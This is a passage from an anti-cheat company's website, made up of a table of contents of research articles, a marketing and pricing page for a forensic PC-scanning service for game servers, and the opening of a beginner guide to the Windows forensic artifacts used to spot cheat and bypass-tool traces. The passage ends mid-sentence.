# Table of Contents - [Clubhouse AC — Forensic PC Scanning for Game Servers](#clubhouse-ac-forensic-pc-scanning-for-game-servers) - [Tier 1 — Foundation PC Checking Methods · Clubhouse AC](#tier-1-foundation-pc-checking-methods-clubhouse-ac) - [Subscribe — Clubhouse AC Research · Clubhouse AC](#subscribe-clubhouse-ac-research-clubhouse-ac) - [Clubhouse AC — Forensic PC Scanning for Game Servers](#clubhouse-ac-forensic-pc-scanning-for-game-servers) - [Security Research · Clubhouse AC](#security-research-clubhouse-ac) - [Clubhouse AC — Forensic PC Scanning for Game Servers](#clubhouse-ac-forensic-pc-scanning-for-game-servers) - [Clubhouse AC — Forensic PC Scanning for Game Servers](#clubhouse-ac-forensic-pc-scanning-for-game-servers) - [TZX Project FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#tzx-project-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [ClubXJefe & Venacy — Full Reverse Engineering Disclosure · Clubhouse AC](#clubxjefe-venacy-full-reverse-engineering-disclosure-clubhouse-ac) - [Process Hollowing Detection via VAD and Section Object Cross-Reference · Clubhouse AC](#process-hollowing-detection-via-vad-and-section-object-cross-reference-clubhouse-ac) - [Reconstructing Cheat Execution After Cleaner-Tool Sweeps · Clubhouse AC](#reconstructing-cheat-execution-after-cleaner-tool-sweeps-clubhouse-ac) - [Phase.uno Cheat Suite — Full Reverse Engineering Analysis of 8 PE Modules · Clubhouse AC](#phase-uno-cheat-suite-full-reverse-engineering-analysis-of-8-pe-modules-clubhouse-ac) - [MFT $SI vs $FN: Detecting Timestomping on NTFS · Clubhouse AC](#mft-si-vs-fn-detecting-timestomping-on-ntfs-clubhouse-ac) - [HWID Spoofer Rotation Detection via SMBIOS + ACPI Cross-Reference · Clubhouse AC](#hwid-spoofer-rotation-detection-via-smbios-acpi-cross-reference-clubhouse-ac) - [Red Engine FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#red-engine-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Gosth FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#gosth-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Keyser FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#keyser-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Detecting BYOVD Chains Through Kernel Callback Forensics · Clubhouse AC](#detecting-byovd-chains-through-kernel-callback-forensics-clubhouse-ac) - [Skript.gg FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#skript-gg-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [HX Software FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#hx-software-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Unicore FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#unicore-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Macho Cheats FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#macho-cheats-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Keyser Cracked FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#keyser-cracked-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Detecting ETW Provider Tampering: Patch, Disable, and Spoof · Clubhouse AC](#detecting-etw-provider-tampering-patch-disable-and-spoof-clubhouse-ac) - [TZ Project FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#tz-project-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Ambani FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#ambani-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Xine FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#xine-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [MrCheat / Turkish Kebab FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#mrcheat-turkish-kebab-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Susano FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#susano-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [D3d10.dll FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#d3d10-dll-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Kazo FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#kazo-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Bang Service TriggerBot FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#bang-service-triggerbot-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [SSTB FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#sstb-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Flyside FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#flyside-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [FiveM.exe Cheat: Detection & Forensic Artifacts · Clubhouse AC](#fivem-exe-cheat-detection-forensic-artifacts-clubhouse-ac) - [Traceless FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#traceless-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [SouthLoader FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#southloader-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [420-Services FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#420-services-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [MW-Privat FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#mw-privat-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [WhatsApp_Installer FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#whatsapp-installer-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Trigger FiveM Cheat (Rechner.exe): Detection & Forensic Artifacts · Clubhouse AC](#trigger-fivem-cheat-rechner-exe-detection-forensic-artifacts-clubhouse-ac) - [Seryx FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#seryx-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Aorist FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#aorist-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [FiveM External Cheat: Detection & Forensic Artifacts · Clubhouse AC](#fivem-external-cheat-detection-forensic-artifacts-clubhouse-ac) - [Anydesk FiveM Cheat Masquerade: Detection & Forensic Artifacts · Clubhouse AC](#anydesk-fivem-cheat-masquerade-detection-forensic-artifacts-clubhouse-ac) - [Aqua TriggerBot FiveM Cheat: Detection & Forensic Artifacts · Clubhouse AC](#aqua-triggerbot-fivem-cheat-detection-forensic-artifacts-clubhouse-ac) - [Revenge Bypass: EFI-Hidden DLL & Desktop.ini Reshade Masquerade | Clubhouse AC Research · Clubhouse AC](#revenge-bypass-efi-hidden-dll-desktop-ini-reshade-masquerade-clubhouse-ac-research-clubhouse-ac) - [PC Checking Methods — Tiered Forensic Methodology · Clubhouse AC](#pc-checking-methods-tiered-forensic-methodology-clubhouse-ac) - [Wexize Bypass: BAM Registry & Prefetch Execution Trail | Clubhouse AC Research · Clubhouse AC](#wexize-bypass-bam-registry-prefetch-execution-trail-clubhouse-ac-research-clubhouse-ac) - [Purge Bypass: Emoji-Named DLL, Discord Bot C2 & VBScript Downloader | Clubhouse AC Research · Clubhouse AC](#purge-bypass-emoji-named-dll-discord-bot-c2-vbscript-downloader-clubhouse-ac-research-clubhouse-ac) - [Old Club44 Bypass: SteamSetup Masquerade with 'Clean Traces' Button | Clubhouse AC Research · Clubhouse AC](#old-club44-bypass-steamsetup-masquerade-with-clean-traces-button-clubhouse-ac-research-clubhouse-ac) - [Superior Bypass: 7-Zip Masquerade with keyauth.win C2 | Clubhouse AC Research · Clubhouse AC](#superior-bypass-7-zip-masquerade-with-keyauth-win-c2-clubhouse-ac-research-clubhouse-ac) - [Star.xyz Bypass: Win32 EXE with keyauth.win LSASS Strings | Clubhouse AC Research · Clubhouse AC](#star-xyz-bypass-win32-exe-with-keyauth-win-lsass-strings-clubhouse-ac-research-clubhouse-ac) - [XRC Bypass: PowerShell IEX In-Memory Loader with Future-Dated DPS | Clubhouse AC Research · Clubhouse AC](#xrc-bypass-powershell-iex-in-memory-loader-with-future-dated-dps-clubhouse-ac-research-clubhouse-ac) - [Ninez Hider: PowerShell EncodedCommand Downloading from Catbox.moe | Clubhouse AC Research · Clubhouse AC](#ninez-hider-powershell-encodedcommand-downloading-from-catbox-moe-clubhouse-ac-research-clubhouse-ac) - [Xytrus Bypass: Unity Game DLL Masquerade Injecting into Explorer | Clubhouse AC Research · Clubhouse AC](#xytrus-bypass-unity-game-dll-masquerade-injecting-into-explorer-clubhouse-ac-research-clubhouse-ac) - [Secure-Bzpass: Process Lasso DLL Hijack with Alt+F12 Injection | Clubhouse AC Research · Clubhouse AC](#secure-bzpass-process-lasso-dll-hijack-with-alt-f12-injection-clubhouse-ac-research-clubhouse-ac) - [Shitty Bypass: Kernel Driver Dropped via certutil to System32 | Clubhouse AC Research · Clubhouse AC](#shitty-bypass-kernel-driver-dropped-via-certutil-to-system32-clubhouse-ac-research-clubhouse-ac) - [Farbenbomber Bypass: PcaSVC & Prefetch Execution Artifacts | Clubhouse AC Research · Clubhouse AC](#farbenbomber-bypass-pcasvc-prefetch-execution-artifacts-clubhouse-ac-research-clubhouse-ac) - [No Trace Bypass: Oversized mycomput.dll in Computer Management | Clubhouse AC Research · Clubhouse AC](#no-trace-bypass-oversized-mycomput-dll-in-computer-management-clubhouse-ac-research-clubhouse-ac) - [Aqua EFI Bypass: Modified Bootloader Running Before Windows | Clubhouse AC Research · Clubhouse AC](#aqua-efi-bypass-modified-bootloader-running-before-windows-clubhouse-ac-research-clubhouse-ac) - [Sulution Software Bypass: Three Build Variants with March 2026 Timestamps | Clubhouse AC Research · Clubhouse AC](#sulution-software-bypass-three-build-variants-with-march-2026-timestamps-clubhouse-ac-research-clubhouse-ac) - [XYZ Corp Bypass: Randomised Executable with xyzcorporation.xyz C2 | Clubhouse AC Research · Clubhouse AC](#xyz-corp-bypass-randomised-executable-with-xyzcorporation-xyz-c2-clubhouse-ac-research-clubhouse-ac) - [Genesis Bypass: pwahelper.exe with Genesis-Rework Hook PDB String | Clubhouse AC Research · Clubhouse AC](#genesis-bypass-pwahelper-exe-with-genesis-rework-hook-pdb-string-clubhouse-ac-research-clubhouse-ac) - [Stainless Bypass: telephon.cpl with RTCore64 BYOVD Chain | Clubhouse AC Research · Clubhouse AC](#stainless-bypass-telephon-cpl-with-rtcore64-byovd-chain-clubhouse-ac-research-clubhouse-ac) - [Apateon Bypass: kokaizanh.exe DPS Timestamp Detection | Clubhouse AC Research · Clubhouse AC](#apateon-bypass-kokaizanh-exe-dps-timestamp-detection-clubhouse-ac-research-clubhouse-ac) - [Titan Bypass: Thorough Artifacts in Event Viewer, Journal Trace, LastActivityView & Notepad | Clubhouse AC Research · Clubhouse AC](#titan-bypass-thorough-artifacts-in-event-viewer-journal-trace-lastactivityview-notepad-clubhouse-ac-research-clubhouse-ac) - [Vanish Bypass: Spotify.exe Masquerade Detection | Clubhouse AC Research · Clubhouse AC](#vanish-bypass-spotify-exe-masquerade-detection-clubhouse-ac-research-clubhouse-ac) - [Sacred Bypass PWNED: Exposed Screenshot Storage & Windhawk Repackaging | Clubhouse AC Research · Clubhouse AC](#sacred-bypass-pwned-exposed-screenshot-storage-windhawk-repackaging-clubhouse-ac-research-clubhouse-ac) - [Wizard Bypass: ApateonDecoy Full Reversal & Detection | Clubhouse AC Research · Clubhouse AC](#wizard-bypass-apateondecoy-full-reversal-detection-clubhouse-ac-research-clubhouse-ac) - [Notepad Bypass: fa817dc1 Full Reversal & Detection | Clubhouse AC Research · Clubhouse AC](#notepad-bypass-fa817dc1-full-reversal-detection-clubhouse-ac-research-clubhouse-ac) - [Club44 Decompiled: BSOD-Triggering System32 Deletion & Hardcoded Brazilian Error Strings | Clubhouse AC Research · Clubhouse AC](#club44-decompiled-bsod-triggering-system32-deletion-hardcoded-brazilian-error-strings-clubhouse-ac-research-clubhouse-ac) - [Spotless Bypass — Detection Report | Clubhouse AC Research · Clubhouse AC](#spotless-bypass-detection-report-clubhouse-ac-research-clubhouse-ac) - [Clubhouse AC — Forensic PC Scanning for Game Servers](#clubhouse-ac-forensic-pc-scanning-for-game-servers) - [Clubhouse AC — Forensic PC Scanning for Game Servers](#clubhouse-ac-forensic-pc-scanning-for-game-servers) - [Clubhouse AC — Forensic PC Scanning for Game Servers](#clubhouse-ac-forensic-pc-scanning-for-game-servers) - [Reverse Engineering Services · Clubhouse AC](#reverse-engineering-services-clubhouse-ac) - [Background Checks & OSINT · Clubhouse AC](#background-checks-osint-clubhouse-ac) - [Anti-Extortion Help · Clubhouse AC](#anti-extortion-help-clubhouse-ac) - [Terms of Service - Clubhouse AC · Clubhouse AC](#terms-of-service-clubhouse-ac-clubhouse-ac) - [Clubhouse AC — Forensic PC Scanning for Game Servers](#clubhouse-ac-forensic-pc-scanning-for-game-servers) - [Tier 2 — Advanced PC Checking Methods · Clubhouse AC](#tier-2-advanced-pc-checking-methods-clubhouse-ac) - [Clubhouse AC — Security Research](#clubhouse-ac-security-research) - [DMA Hardware Fingerprinting: PCILeech and Squirrel Detection · Clubhouse AC](#dma-hardware-fingerprinting-pcileech-and-squirrel-detection-clubhouse-ac) - [Tier 3 — Elite Forensic PC Checking · Clubhouse AC](#tier-3-elite-forensic-pc-checking-clubhouse-ac) - [Tier 4 — Full Forensic Acquisition & Reconstruction · Clubhouse AC](#tier-4-full-forensic-acquisition-reconstruction-clubhouse-ac) - [Tier 5 — Overwrite Detection & Contradiction Forensics · Clubhouse AC](#tier-5-overwrite-detection-contradiction-forensics-clubhouse-ac) --- # Clubhouse AC — Forensic PC Scanning for Game Servers Built for FiveM Clubhouse AC Security Services ============================== Providing anti-cheat investigations, reverse engineering, digital forensics, and open-source intelligence research. [Get Started](https://clubhouseac.shop/#pricing) [Learn More](https://clubhouseac.shop/#demo) No install required for adminsResults in < 60s23,357\+ detection rules12 supported games Scan Report Scanning Analyzing forensic artifacts...0% Prefetch Analysis BAM Entries Registry Forensics DPS Service PcaSvc Traces DMA Hardware LSASS Analysis USN Journal 23,357+ Detection Rules <60s Avg Scan Time 12 Supported Games 24/7 Always Online 4,433 YARA rules·1,856 forensic checks·17,068 process signatures·[verify live](https://clubhouseac.shop/api/detection-stats) ·last counted 2026-05-23 Industry alongside Operates alongside the industry's best -------------------------------------- Clubhouse AC complements the leading live, kernel-based anti-cheats — filling the forensic gap they cannot reach. We recover the evidence cheaters leave behind, even after deletion, anti-forensic cleanup, and HWID rotation. ![EasyAntiCheat](https://clubhouseac.shop/EASY%20ac.jpg) EasyAntiCheat Epic Games ![BattlEye](https://clubhouseac.shop/battle%20eye.png) BattlEye BE Service ![Vanguard](https://clubhouseac.shop/vanguard.png) Vanguard Riot Games ![FACEIT AC](https://clubhouseac.shop/face%20it.png) FACEIT AC FACEIT ![VAC](https://clubhouseac.shop/VAC.jpg) VAC Valve ![Ricochet](https://clubhouseac.shop/Riot.jpg) Ricochet Activision Live AC + forensic Run both. Live anti-cheat watches the running process. Clubhouse AC reads the trail it can't see. Survives cleanup Prefetch, BAM, Amcache, ShimCache, USN journal, registry transaction logs — evidence that persists. Kernel-aware Detects BYOVD chains, unsigned drivers, DMA hardware artifacts, and HWID spoofer signatures. Clubhouse AC is an independent forensic platform. All trademarks are the property of their respective owners. We are not affiliated with, endorsed by, or sponsored by EasyAntiCheat (Epic Games), BattlEye, Vanguard (Riot Games), FACEIT, Valve Anti-Cheat, or Ricochet (Activision). Live Preview See it in action ---------------- Run a simulated scan and explore the results the same way you would on the real dashboard. No download, no account — just click start. Interactive ClubhouseAC ScannerDEMO ### Try the Scanner Demo See exactly what a real scan looks like. This demo simulates the full scanning process and shows sample detections — no download needed. Start Demo Scan Detection Suite We find what they try to hide ----------------------------- Cheaters delete files, clean registries, and use bypass tools. We recover the evidence anyway. [Run the live demo](https://clubhouseac.shop/#demo) ### Executors & Menus Eulen, RedEngine, Cherax Flagship category 02 ### Injectors Xenos, Process Hacker traces 03 ### Bypass Tools Club44, BAM cleaners, partition tools 04 ### Anti-Forensics Timestomping, registry cleaners 05 ### HWID Spoofers Disk spoofs, MAC changers 06 ### Mod Menus Paid and free FiveM menus Simple Setup Dead simple to use ------------------ No complicated setup. No learning curve. [Start your server](https://clubhouseac.shop/#pricing) [Try the demo](https://clubhouseac.shop/#demo) 2. 01 ### Send the link Give the suspect your scanner download link 3. 02 ### They run it 60 second scan, fully automated 4. 03 ### Review results Check your dashboard for findings Side by side Live anti-cheats miss what matters ---------------------------------- Live AC watches running processes. We read the forensic trail a cheater leaves behind — the evidence that survives cleanup. Typical stack ### Live anti-cheat * Kernel driver watching live processes * Blocks injection while the game is running * Blind after the player closes the game * No signal when a cheater uses a cleaner tool * Can't see deleted files, cleared prefetch, or BAM * Missed when HWID spoofer rotates between sessions What we do Forensic ### Clubhouse AC * Reads the evidence cheaters leave behind * Prefetch, BAM, Amcache, ShimCache, USN journal * Recovers deleted registry keys from transaction logs * Detects cleaner tools, timestomping, HWID spoofers * Flags BYOVD chains and unsigned kernel drivers * Works even after the cheater swept their tracks Run both. Clubhouse AC is designed to sit alongside EasyAntiCheat, BattlEye, Vanguard, FACEIT and friends — not replace them. From the research team Forensic case studies --------------------- Detection methodologies, artifact-chain breakdowns, and disclosure write-ups from the Clubhouse AC research team. Defensive material only. [All research notes](https://clubhouseac.shop/research) [Kernel forensics\ \ Critical\ \ ### Detecting BYOVD chains through kernel callback forensics\ \ Reconstructing RTCore64 / GIGABYTE / Capcom driver loads from USN, registry transaction logs, and CodeIntegrity events.\ \ Read research](https://clubhouseac.shop/research/byovd-rtcore-chain) [Anti-forensics\ \ High\ \ ### Reconstructing cheat execution after cleaner-tool sweeps\ \ Amcache, ShimCache, RecentFileCache.bcf, and registry transaction logs preserve enough fragments to rebuild execution timelines.\ \ Read research](https://clubhouseac.shop/research/eulen-prefetch-recovery) [Anti-forensics\ \ Medium\ \ ### MFT $SI vs $FN: detecting timestomping on NTFS\ \ A delta-detection rule that flagged 100% of timestomp attempts in our 312-sample cheat-loader corpus.\ \ Read research](https://clubhouseac.shop/research/timestomp-mft-detection) Multi-Game Support One platform, every game ------------------------ Purchase a license for the game your community plays. Each license ships the full detection suite tuned for that game's cheat ecosystem. [Pro covers all games](https://clubhouseac.shop/checkout?plan=pro) ![FiveM / GTA V](https://cdn.cloudflare.steamstatic.com/steam/apps/271590/library_hero.jpg) Most PopularLive ### FiveM / GTA V Detect TZX, Eulen, Gosth, Susano, RedEngine, DMA cheats + 90+ hash signatures. [Select license duration](https://clubhouseac.shop/checkout?plan=starter&game=fivem) ![Rust](https://cdn.cloudflare.steamstatic.com/steam/apps/252490/library_hero.jpg) Live ### Rust Detect STERN, WyvernKernel, DMA hardware (PCILeech), BYOVD driver traces, HWID spoof artifacts, and server-side recoil/ESP signals. [Select license duration](https://clubhouseac.shop/checkout?plan=starter&game=rust) ![Rainbow Six Siege](https://cdn.cloudflare.steamstatic.com/steam/apps/359550/library_hero.jpg) Live ### Rainbow Six Siege Uncover Vega, Crusader, Ring-1 kernel driver traces, BattlEye bypass logs, and injector remnants. [Select license duration](https://clubhouseac.shop/checkout?plan=starter&game=r6s) ![Fortnite](https://media.rawg.io/media/games/dcb/dcbb67f371a9a28ea38ffd73ee0f53f3.jpg) Live ### Fortnite Detect Fortnite-External, CR3, HookEdge, Lambda, Trigon, and EngineOwning loaders, Phantom Overlay DMA artifacts, and EAC driver-unload residue. [Select license duration](https://clubhouseac.shop/checkout?plan=starter&game=fortnite) ![Minecraft](https://static-cdn.jtvnw.net/ttv-boxart/Minecraft-285x380.jpg) Live ### Minecraft Detect Wurst, Meteor, LiquidBounce, Vape, Future, Doomsday, Impact, and Sigma client residue, Mixin/JVM agent attach traces, and plugin channel brand spoofing. [Select license duration](https://clubhouseac.shop/checkout?plan=starter&game=minecraft) ![Roblox](https://media.rawg.io/media/games/3af/3af386b6e26be6741b711ae6215ef42f.jpg) Live ### Roblox Detect Solara, Wave, Delta, Xeno, Matrix Hub, Fluxus, and Hydrogen executor residue, ROBLOX DLL injector hooks, and bytecode dumper artifacts. [Select license duration](https://clubhouseac.shop/checkout?plan=starter&game=roblox) ![Valorant](https://media.rawg.io/media/resize/1280/-/games/b11/b11127b9ee3c3701bd15b9af3286d20e.jpg) Live ### Valorant Detect Hyperion, Verum, Krypton, ChickenCheats, and Lethal Cheats loaders, TPM/Vanguard spoof traces, and unsigned kernel driver mappers. [Select license duration](https://clubhouseac.shop/checkout?plan=starter&game=valorant) ![CSGO](https://cdn.cloudflare.steamstatic.com/steam/apps/730/library_hero.jpg) Live ### CSGO Detect Onetap, Gamesense, Neverlose, Aimware, Pandora, and Plaguecheat config residues, VAC-bypass loaders, and external overlay hooks. [Select license duration](https://clubhouseac.shop/checkout?plan=starter&game=csgo) ![Escape from Tarkov](https://media.rawg.io/media/resize/1280/-/games/a9a/a9ab53644b92698b18957a362c99b4e2.jpg) Live ### Escape from Tarkov Detect AYY, Lone, Hyperion, and Skript EFT configs, LeetDMA/Captain DMA radar firmware traces, Phantom Overlay artifacts, and SPT-AKI tampering. [Select license duration](https://clubhouseac.shop/checkout?plan=starter&game=tarkov) ![Hytale](https://media.rawg.io/media/screenshots/e07/e078133814390e6a53b0839706d3a01e.jpg) Live ### Hytale Detect early Hytale ghost client builds, Forge/Mixin-style mod injector loaders, JVM agent attach traces, asset cache tampering, and Hypixel SDK bypass artifacts. [Select license duration](https://clubhouseac.shop/checkout?plan=starter&game=hytale) ![Garry's Mod](https://cdn.cloudflare.steamstatic.com/steam/apps/4000/library_hero.jpg) Live ### Garry's Mod Detect Project Pegasus, BloodGod, Outrun.gg, LMaobox, and Aimware loader residue, Lua executor injectors, and source-engine signature evasion. [Select license duration](https://clubhouseac.shop/checkout?plan=starter&game=garrysmod) ![Arc Raiders](https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS4_x8HSwJpEbVUv3vLC4eaaz4xmLhjsc1PlzKczrKW9Ws12LhCvj1Oj-1uY5GcFR96awv6&s=10) NewLive ### Arc Raiders Detect early Arc Raiders ESP/aimbot loaders, LeetDMA/Captain DMA radar firmware traces, EAC bypass remnants, and unsigned driver injectors. [Select license duration](https://clubhouseac.shop/checkout?plan=starter&game=arcraiders) Why admins trust us Built the way forensic tools should feel ---------------------------------------- Three principles we hold ourselves to: precision over noise, tenant isolation by default, and a dashboard that respects your time. ### Forensic, not reactive We read what cheaters leave behind — deleted files, cleaned registries, BAM entries, prefetch. Evidence survives deletion. ### Your data, your server Scans belong to the admin who ran them. No one else on our platform can see your results. ### Results in under 60 seconds Player runs the scanner, you get a full report with screenshots, detections, and system info instantly. Free Tool Check any Discord user ---------------------- Instantly scan a Discord ID against global cheating databases. Free to use, no account required. GTA, Minecraft & message intelligence powered by [CheaterStats](https://cheaterstats.cc/) . Check User Right-click a Discord user → Copy User ID (requires Developer Mode enabled) 3 Databases All Games Message History Secure & Private Launch Pricing - Limited Time Pricing ------- Lock in these rates before we raise them Monthly3 MonthsYearlySAVE 50%+ ### Starter $9.99/month$14.99 * 1 game of your choice * Unlimited scans * Full detection suite * Discord support [Get Started](https://clubhouseac.shop/checkout?plan=starter) Most Popular ### Pro $19.99/month$29.99 * Clubhouse AI verdicts on every detection * AI chat assistant — full scan context * AI false-positive detection * Hybrid Analysis threat-intel lookup * VirusTotal hash scanning * 1 game of your choice * Unlimited scans * Full detection suite * Priority support * Custom branding * API access * Export reports [Get Started](https://clubhouseac.shop/checkout?plan=pro) Limited ### Lifetime $265one-time$399.99 * Clubhouse AI verdicts on every detection * AI chat assistant — full scan context * AI false-positive detection * Hybrid Analysis threat-intel lookup * VirusTotal hash scanning * All 12 supported games * Pay once, use forever * Unlimited scans * Full detection suite * Priority support * API access * All future updates [Get Lifetime Access](https://clubhouseac.shop/checkout?plan=lifetime) ### Server Network Contact Us * All 12 supported games * Unlimited scans * Most Pro features (AI + threat intel sold separately) * Dedicated support * Multiple servers * Pricing based on member count [Build a quote](https://clubhouseac.shop/quote) Start in minutes Ready to protect your server? ----------------------------- Join server admins who trust Clubhouse AC to catch what live anti-cheats miss. Set up in under five minutes. [Get Started](https://clubhouseac.shop/#pricing) [Check a user free](https://clubhouseac.shop/check-user) --- # Tier 1 — Foundation PC Checking Methods · Clubhouse AC Tier 1Quick triage · 5–10 min · 37 methods Foundation ========== PC checking (also called a screenshare or SS) is a forensic-style review of a computer to determine cheat usage. Tier 1 covers the standard artifact set every check should walk: where Windows leaves footprints of execution, persistence, file activity, and user behaviour — even after the cheat itself is gone. All37Info2Tool Downloads3Execution Artifacts5Logs & Events2File System6User Activity4Registry1Persistence & Services3Live System4Network & Devices2Advanced4Tools1 T1 Info ---- 2 ### What is PC checking? PC checking is a forensic-style review of a player's computer — usually done live — to determine whether they've used cheats, loaders, or bypass tools. It's not about catching someone instantly: it's about collecting and correlating evidence from Windows artifacts to see if there are traces of suspicious activity. Even if a cheat is no longer running, Windows leaves behind footprints. PC checking is the process of finding and interpreting those footprints. ### What is a bypass? A bypass is anything used to hide, disguise, or prevent evidence of cheating from being detected. This includes clearing logs, timestomping files, disabling services, wiping artifacts, or using tools designed to destroy forensic evidence. T1 Tool Downloads -------------- 3 ### Eric Zimmerman Tools (EZ Tools) The cornerstone forensic toolkit. Every parser referenced across this tier is part of this suite. Extract with 7-Zip or WinRAR (Windows blocks DLLs if you use built-in extract). Requires .NET 4.7.2 or .NET 9. 3 tools ### Sysinternals (Microsoft) Microsoft's essential live-system inspection toolkit, covering process analysis, autostart enumeration, driver signing, and real-time monitoring. Process Explorer, Autoruns, and Sigcheck are used in nearly every Tier 1 check. All tools are portable and can be run directly without installation, making them safe to bring into an active SS session. 2 tools ### NirSoft Tools NirSoft produces lightweight, single-file portable utilities that require no installation — ideal for running during a live SS. Their forensic tools are especially strong for browser history, USB device history, and execution evidence. Many tools present data in a clean GUI and can export to CSV, making them a fast alternative to command-line parsers. 2 tools T1 Execution Artifacts ------------------- 5 ### Prefetch Analysis Windows creates .pf files in C:\\Windows\\Prefetch every time a program executes. Each file logs the executable name, last 8 run timestamps, total run count, and all files/DLLs loaded during execution. Even after deletion, traces persist. Prefetch is one of the first places to check during any SS. 1 tool1 location1 command4 bypass ### AmCache Parsing The Amcache.hve is a registry hive that tracks installed programs, executed files, and their SHA-1 hashes. It records data even after the original file is deleted. One of the most reliable execution artifacts. 1 tool1 location1 command3 bypass ### ShimCache (AppCompatCache) ShimCache is stored in the SYSTEM registry hive and records the full path + last modified timestamp of executables Windows has encountered. It logs entries even if the program never fully ran — just being on disk can create an entry. 1 tool1 location1 command2 bypass ### BAM / DAM Background Activity Moderator (BAM) and Desktop Activity Moderator (DAM) track which executables ran and exactly when. Stored in the SYSTEM registry hive. Timestamps are kernel-generated and very hard to fake. 2 tools2 locations3 bypass ### UserAssist UserAssist tracks GUI programs launched through Explorer. It records the program name, run count, last execution time, and focus time. Data is ROT13 encoded in the registry but easy to decode. 2 tools1 location T1 Logs & Events ------------- 2 ### Windows Event Logs Windows logs system, security, and application events in .evtx files. These record service changes, process creation, driver installs, logon activity, and more. Essential for building a timeline. 2 tools1 location1 command3 bypass ### PowerShell & CMD History PowerShell saves command history to a text file. CMD stores recent commands in memory via doskey. PowerShell also logs Script Block Logging and Module Logging to event logs if enabled. 2 tools3 locations3 bypass T1 File System ----------- 6 ### USN Journal Review The USN (Update Sequence Number) Journal is an NTFS change log. It records every file creation, deletion, rename, and modification on a volume. This is a goldmine for finding deleted cheats because even after a file is gone, the journal remembers it existed. 1 tool1 location1 command ### MFT & Timestamp Analysis The $MFT (Master File Table) is the backbone of NTFS. Every file and folder has an MFT entry with two sets of timestamps — $STANDARD\_INFO and $FILE\_NAME. Comparing these reveals timestomping (faking file dates). 2 tools1 location1 command ### Alternate Data Streams (ADS) NTFS allows files to have hidden data streams attached. Cheats can hide payloads inside ADS of innocent-looking files. They are completely invisible in File Explorer. The Zone.Identifier stream is automatically added to any file downloaded from the internet — useful for proving a file was downloaded. 2 tools1 command ### Recycle Bin Review When files are deleted, Windows stores metadata in $I files inside the Recycle Bin. These record the original file path, filename, file size, and deletion timestamp — even after the bin is emptied in some cases. 1 tool1 location1 command ### Shadow Copies & Restore Points Volume Shadow Copies (VSS) are automatic snapshots of the file system. They can contain older versions of files that have since been deleted or modified — including cheat files that were cleaned up. 1 tool1 command3 bypass ### Disk Cleanup & Evidence Wiping Users who cheat often try to destroy evidence before a check. This includes running disk cleanup, CCleaner, BleachBit, or manual deletion scripts. The act of cleanup itself leaves traces. 1 command T1 User Activity ------------- 4 ### Recent Files & Quick Access Windows tracks recently opened files via LNK (shortcut) files and Jump Lists. Even if the original file is deleted, the shortcut file remains and contains the original file path, timestamps, volume info, and MAC address. 2 tools3 locations1 command ### Browser Download History Chrome, Edge, and Firefox store browsing/download history in SQLite databases. Even after clearing history, traces often remain in other artifacts (Prefetch, USN Journal, LNK files). 2 tools3 locations ### Temp & AppData Deep Scan Cheats love hiding in temp folders and AppData because most users never look there. These directories are the most common drop locations for loaders, injectors, and config files. 3 tools4 locations1 command ### Archive Files (ZIP/RAR) Inspection Cheats are almost always distributed as archives. Even if the extracted contents are deleted, the archive itself (or traces of it) may remain. T1 Registry -------- 1 ### Registry Checks — Run Keys, MUICache, UserAssist The Windows Registry is a database of system and user settings. Multiple keys track program execution, persistence, and system changes. 3 tools5 locations T1 Persistence & Services ---------------------- 3 ### Services.msc Inspection Windows Services run in the background. Cheats can install as services for persistence, and bypasses often disable forensic services to prevent evidence collection. 2 tools1 command ### Task Scheduler Review Task Scheduler can be used to run programs at specific times, on logon, 